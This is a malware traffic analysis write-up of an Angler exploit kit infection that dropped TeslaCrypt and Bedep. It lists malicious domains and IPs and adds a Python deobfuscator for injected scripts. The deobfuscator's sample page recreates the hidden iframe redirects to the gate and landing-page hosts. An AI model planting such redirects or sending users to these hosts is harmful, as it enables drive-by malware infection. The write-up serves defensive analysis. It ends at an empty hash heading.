Angler EK sends TeslaCrypt and Bedep – Finding Bedeps .dll

ASSOCIATED DOMAINS:

  • 320coldhams.com – COMPROMISED SITE
  • 89.108.83.88 – shark.cruzinshare.com – GET /topic/74728 – ANGLER LANDING PAGE [TeslaCrypt]
  • 46.101.17.191 – asd.yasyka1lyamhochy.info – GET /megaadvertize/? – admedia gate
  • www.ecb.europa.eu – BEDEP POST INFECTION TRAFFIC PATTERN
  • 160.153.49.102 – toolaria.com – POST /sysstr.php – TESLACRYPT POST INFECTION TRAFFIC
  • 64.20.35.186 – diwali2k15.in – POST /sysstr.php – TESLACRYPT POST INFECTION TRAFFIC

IMAGES and DETAILS:

Shown above: Extraction of the compromised site's index page using Wireshark (File => Export Objects => HTTP), saving it as a .htm file for analysis in a text editor.

 

Shown above: The index page shows a hexadecimal script injection in the compromised site, redirecting to the asd.yasyka1lyamhochy.info admedia gate

 

Shown above: Using a hex-to-ASCII converter reveals the redirect to asd.yasyka1lyamhochy.info

 

Shown above: The index page shows a second injected script (an “iframe”) redirecting to shark.cruzinshare.com, Angler's landing page
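The decoding step from the two injections above, as an added example rather than anything from the original post: it strips the hex-escaped (and a few other common) string encodings from an exported index page and lists the iframe hosts that fall out. The sample HTML is constructed here and only reuses the host names from this write-up; the real injection was not copied.

```python
import re
from html import unescape
from urllib.parse import urlparse

def _hex_escape(s: str) -> str:
    """Used only to build the constructed sample below (kits do this server-side)."""
    return "".join(f"\\x{ord(c):02x}" for c in s)

# Constructed sample page, not the real compromised index page: a hex-escaped
# document.write() hiding an iframe to the gate, then a plain hidden iframe.
SAMPLE_HTML = (
    "<html><body><p>Welcome</p>\n"
    '<script>document.write("'
    + _hex_escape('<iframe src="http://asd.yasyka1lyamhochy.info/megaadvertize/?" '
                  'width="1" height="1"></iframe>')
    + '");</script>\n'
    '<iframe src="http://shark.cruzinshare.com/topic/74728" style="display:none"></iframe>\n'
    "</body></html>\n"
)

HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")                  # \x3c
URL_ESC = re.compile(r"%([0-9a-fA-F]{2})")                    # %3c
CHARCODE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")  # String.fromCharCode(60,...)
IFRAME_SRC = re.compile(r"""<iframe[^>]*\ssrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def decode_layer(text: str) -> str:
    """Undo one layer of the string encodings commonly seen in injected scripts."""
    text = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = URL_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = CHARCODE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), text)
    return unescape(text)  # &#x3c; / &#60; HTML entities

def deobfuscate(text: str, max_rounds: int = 5) -> str:
    """Decode repeatedly, since one encoding is sometimes nested inside another."""
    for _ in range(max_rounds):
        decoded = decode_layer(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_redirects(html: str) -> list[str]:
    """Return the iframe target hosts exposed after decoding, in page order."""
    hosts = []
    for url in IFRAME_SRC.findall(deobfuscate(html)):
        host = urlparse(url).hostname or url
        if host not in hosts:
            hosts.append(host)
    return hosts
```

Run `find_redirects` over the .htm exported from Wireshark to get the same two hosts the screenshots show; anything it returns that is not the site's own domain is worth a closer look.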

 

Shown above: The Referer shows the redirect (iframe) from the compromised site to the Angler EK landing page

 

Shown above: A known Bedep pattern used to check whether the infected computer has an active internet connection

 

Shown above: TeslaCrypt post-infection traffic. The highlighted area shows the new command and control (C2) host

 

Shown above: New naming variant of TeslaCrypt ransom note

 

Shown above: Bedep is known to save its .dll payload in the C:\ProgramData\ directory. Post-infection, Bedep hid this directory.

 

Shown above: Using SearchMyFiles from NirSoft you can see the hidden directory, as well as the two TeslaCrypt .exe files dropped in the Documents folder during the infection.

 

Shown above: Bedep file details

 

Shown above: Details of the TeslaCrypt files dropped in the Documents folder

 

MD5 HASHES FOR EXPLOITS AND PAYLOAD FROM ANGLER EK: